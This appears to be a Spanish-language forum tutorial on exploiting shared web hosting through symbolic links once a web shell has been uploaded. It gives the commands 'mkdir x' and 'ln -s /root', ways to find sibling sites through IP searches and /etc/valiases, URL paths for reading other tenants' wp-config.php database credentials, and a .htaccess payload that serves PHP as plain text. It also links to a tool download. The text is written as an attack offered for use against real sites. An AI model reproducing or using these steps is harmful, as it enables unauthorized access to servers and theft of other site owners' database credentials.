Symlink = Son enlaces symbolicos, seria como acceso directos a otros directorios.. Para que se documenten sobre el tema : http://en.wikipedia.org/wiki/Symbolic_link (Aunque wikipedia no ayuda de mucho. )
Bueno para explotar dicha vulneabilidad nesecitamos ya haber subido una shell en un sitio web. en mi caso para este ejemplo usare un sitio para explicar desde 0.
Teniendo la shell Up.
Hay que saber que todo sitio no es vulnerable a symlink, y para que sea vulnerable debe cumplir con 2 condiciones...
1. Que sea Posible Leer /etc/passwd
2. Que su estructura del server sea /Home/User/Public_html/
Empezamos y creare una carpeta en el sitio para hacer el symlink totalmente limpio.
Llamare a la carpeta "x"
mkdir x
Entraremos a esa carpeta, y lo que haremos es Sacar el /root Con los siguiente comando:
ln -s /root
Visualizamos la url:
Luego de haber sacado el root debemos dar reversa a la ip del servidor y localizar un website del servidor con alguna CMS ( Joomla, Worpress , Etc...") Con el fin de sacar la configuracion de la base de datos. En mi caso ya tengo un objectivo del servidor que es:
Podemos "Bingear" Usando :
IP:$IpDelServer$ Joomla
IP:$IpDelServer$ Worpress
ej:
IP: 182.111.40.21
Siendo $IpDelServer$ La Variable ( La ip de el servidor )
Una vez sacado un objetivo se debe buscar.. el nombre ese sitio en el servidor y lo prodremos hacer con este comando:
ls -la /etc/valiases/$site.com
Solo remplazas $site.com por el sitio escojido dentro del servidor y Wala! Tendras el nombre del sitio en el servidor.. yo voy a hacerlo con un tienda hecha en worpress.
Guarda el nombre que te dio el nombre ( Parte subrayada en la imagen )
y nos devolvemos de nuevo a la carpeta del root y empezamos a ingresar por medio de la url:
sitio/x/root/
sitio/x/root/home/
sitio/x/root/home/$Nombre/
Sitio/x/root/home/$Nombre/Public_html/
Sitio/x/root/home/$Nombre/Public_html/wp-config.php ( Config de la Worpress )
en mi caso de ejemplo:
Vizualizando la config
Bueno Habra caso donde no de logre visualizar la config por q te diga "forhiben"
Para eso solo debes subir un .htaccess a la carpeta /x/
con esto adentro:
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
Cabe aclarar q ya hay shell q hacen esto ya automatizadamente como la shell q yo poseo. pero aveces no funciona y en mi opinion personal siempre prefiero hacerlo manual!
"Symlink Manual" Normalmente funciona 100% Donde la shell.
Mas adelante estare enseñando Bypass a el error "500 Internal Server Error" entre otros problemas que normamente salen del symlink.
DESCARGAR Symlink :
http://www.mediafire.com/?rmw3nblbtb5ts7n